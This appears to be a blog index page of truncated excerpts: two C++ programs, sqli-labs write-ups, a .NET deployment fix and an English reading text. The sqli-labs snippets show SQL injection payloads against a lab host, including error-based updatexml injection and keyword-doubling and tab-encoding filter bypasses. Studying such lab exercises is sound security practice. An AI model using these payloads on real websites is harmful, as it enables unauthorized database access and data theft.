#include <iostream> using namespace std; #define SIZE 9 #define MAXLEN 6 int data[SIZE][MAXLEN]; int numberLen[SIZE]; int overlapLen[SIZE+1][SIZE+1]; void IToA(int N ,int row) //数字转换为数组 { int tmp=N; int i=0; while(tmp) { i++; tmp/=10; } numberLen[ro…
#include <iostream> using namespace std; #define SIZE 12 int data[SIZE]; int data1[SIZE]; int n; int minstep; void xipai(int m); bool shun(); void dfs(int step); int main() { freopen("in.txt","r",stdin); minstep=6; while(scanf(&q…
Less-30 GET - BLIND - IMPIDENCE MISMATCH- Having http://10.10.202.112/sqli/Less-30?id=1" #false http://10.10.202.112/sqli/Less-30?id=1"--+ #true http://10.10.202.112/sqli/Less-30?id=1" order by 4--+ #false http://10.10.202.112/sqli/Less-30?…
Less-27 GET - Error Based- All your UNION and select belong to us 过滤了union 和select的报错注入 查看源码: 使用%09 替换空格,大小写混淆绕过,关键字符,双写等绕过 UNiON,SElecT ununionion seselectlect payload: http://10.10.202.112/sqli/Less-27/?id=1' %09and %09updatexml(null,concat(0x0a,(S…
Less-23 GET - Error based - strip comments http://10.10.202.112/sqli/Less-23?id=1' Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in C:\phpStudy2018\PHPTutorial\WWW\sqli\Less-23\index.php on line 38 You have an error i…
Less-21:括号+单引号绕过+base64cookie编码 总感觉我已经把sql注入做成代码审计了:P <?php //including the Mysql connect parameters. include("../sql-connections/sql-connect.php"); if(!isset($_COOKIE['uname'])) { //including the Mysql connect parameters. include("../sq…
如果你看到这篇文章,先别急着动手,过完一遍,确定是你要的再动手. 别人提到的这里不赘述,只说查了好久才知道的. 1号坑:System.IO.FileNotFoundException Could not find file "roslyn\csc.exe".详细信息如下: System.IO.FileNotFoundException Could not find file "/var/www/defalut/bin\roslyn\csc.exe". Descrip…
Text I entered the hotel manager's office and sat down. I had just lost £50 and I felt very upset. 'I left the money in my room,' I said, 'and it's not there now.' The manager was sympathetic, but he could do nothing. 'Everyone's losing money these d…